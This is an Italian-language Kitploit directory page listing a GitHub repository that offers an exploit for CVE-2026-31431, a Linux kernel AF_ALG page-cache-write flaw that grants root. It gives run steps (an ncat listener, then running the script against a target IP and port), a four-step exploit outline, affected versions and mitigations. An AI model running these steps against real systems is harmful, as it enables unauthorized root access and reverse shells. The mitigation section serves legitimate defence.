Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2026-31431-RCE-Exploit — # Exploit di escalation dei privilegi locali per CVE-2026-31431 Exploit di escalation dei privilegi locali per CVE-2026-31431, un difetto logico nel kernel Linux AF_ALG che consente a utenti non privilegiati di scrivere 4 byte nella cache delle pagine e ottenere i privilegi di root. Include script PoC e indicazioni di mitigazione. | Kitploit
Strumenti/GitHubGitHub/m4xsec/cve-2026-31431-rce-exploit
Escalation di PrivilegiFramework di ExploitAnalisi delle VulnerabilitàExploitRed TeamingEscape dal ContainerBinary Exploitation
GitHubm4xsec/cve-2026-31431-rce-exploit

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →

Informazioni

# Exploit di escalation dei privilegi locali per CVE-2026-31431 Exploit di escalation dei privilegi locali per CVE-2026-31431, un difetto logico nel kernel Linux AF_ALG che consente a utenti non privilegiati di scrivere 4 byte nella cache delle pagine e ottenere i privilegi di root. Include script PoC e indicazioni di mitigazione.

CVE-2026-31431-RCE-Exploit

Vedi Repository
7294 mesi faNon ancora revisionato
Condividi

🔴 CVE-2026-31431 — "Copy Fail"

Un Bug Logico del Kernel Linux Vecchio di 9 Anni che Concede Root in Secondi

CVE CVSS Kernel Since


Panoramica

Copy Fail è una vulnerabilità di escalation dei privilegi locale (LPE) ad alta gravità nel sottosistema crittografico del kernel Linux (algif_aead). Scoperta e divulgata da Theori (tramite il loro strumento di ricerca di vulnerabilità assistito da IA Xint Code) il 29 aprile 2026, la falla consente a qualsiasi utente locale non privilegiato di scrivere 4 byte controllati nella cache delle pagine di qualsiasi file leggibile — e sfruttare ciò per ottenere root su praticamente ogni distribuzione Linux principale rilasciata dal 2017.

Un proof-of-concept funzionante è di soli ~732 byte di Python.


Sfruttamento

  1. Avvia il listener Ncat
root@kitploit:~
sudo ncat -lvnp PORT
  1. Esegui l'exploit sulla macchina target
root@kitploit:~
# Usando lo script Python
python3 CVE-2026-31431-Exploit.py IP PORT

# Binario compilato
chmod +x CVE-2026-31431-Exploit
./CVE-2026-31431-Exploit IP PORT

🧬 Riepilogo Tecnico

Come Funziona l'Exploit (4 Passaggi)

  1. Apri un socket AF_ALG e associalo a authencesn(hmac(sha256),cbc(aes))
  2. Esegui splice delle pagine di un binario setuid leggibile nel socket
  3. La scrittura scratch AEAD del kernel sovrascrive 4 byte nella cache delle pagine di quel binario
  4. Esegui il binario setuid ora corrotto → shell root

Perché è Pericoloso

  • Nessuna finestra di gara — deterministico, funziona sempre
  • Nessun offset del kernel / bypass KASLR necessario
  • Lo stesso exploit funziona su tutte le distro — Ubuntu, RHEL, Amazon Linux, SUSE, Rocky, ecc.
  • Fuga dal container — la cache delle pagine è condivisa; una scrittura dall'interno di un container influisce sull'host
  • Nessuna modifica al disco — i monitor di integrità dei file (AIDE, OSSEC, ecc.) non lo rileveranno
  • Nessuna traccia forense su disco

🎯 Versioni Interessate

Distribuzioni Confermate Vulnerabili

  • Ubuntu 24.04 LTS
  • Amazon Linux 2023
  • RHEL 10.1
  • SUSE 16
  • Rocky Linux 9.7

Essenzialmente ogni distribuzione Linux principale rilasciata dal 2017 è interessata.


🛡️ Mitigazione

1. Patch (Consigliata)

Aggiorna il tuo kernel a una versione contenente il commit di correzione fafe0fa2995a. La maggior parte delle distribuzioni principali ha rilasciato o sta rilasciando pacchetti kernel aggiornati.

2. Soluzioni Temporanee

Se non puoi applicare la patch immediatamente:

  • Blocca la creazione di socket AF_ALG tramite policy seccomp
  • Metti in blacklist il modulo algif_aead:
    root@kitploit:~
    echo "blacklist algif_aead" | sudo tee /etc/modprobe.d/disable-algif-aead.conf
    sudo modprobe -r algif_aead 2>/dev/null
    

⚠️ Disclaimer

Questo repository è solo a scopo educativo e difensivo. Le informazioni qui contenute hanno lo scopo di aiutare i team di sicurezza a comprendere, rilevare e mitigare CVE-2026-31431. Segui sempre le pratiche di divulgazione responsabile e le leggi applicabili.


⭐ Metti una stella a questo repo per rimanere aggiornato su patch e linee guida di rilevamento.

Scarica lo strumento
CampoDettaglio
ID CVECVE-2026-31431
Punteggio CVSS7.8 (ALTO)
TipoEscalation dei Privilegi Locale (LPE)
Componentealgif_aead — interfaccia crittografica AF_ALG del kernel Linux per lo spazio utente
Causa PrincipaleDifetto logico nel template AEAD authencesn; un'ottimizzazione in-place (commit 72548b093ee3, agosto 2017) fa sì che le pagine della cache delle pagine appaiano nello scatterlist di destinazione scrivibile del kernel
PrimitivaScrittura controllata di 4 byte nella cache delle pagine di qualsiasi file leggibile
Meccanismo dell'ExploitSocket AF_ALG → splice() → corruzione della cache delle pagine di un binario setuid → root
Condizione di Gara?❌ Nessuna — difetto logico lineare, affidabilità al 100%
Offset del Kernel Necessario?❌ No
Commit di Correzionefafe0fa2995a (annulla l'ottimizzazione del 2017)
InteressateNon Interessate
Kernel Linux 4.14 fino a 7.0-rcKernel precedenti alla 4.14 (prima del commit di agosto 2017)
Tutte le 6.18.x precedenti alla 6.18.226.18.22+ (corrette)
Tutte le 6.19.x precedenti alla 6.19.126.19.12+ (corrette)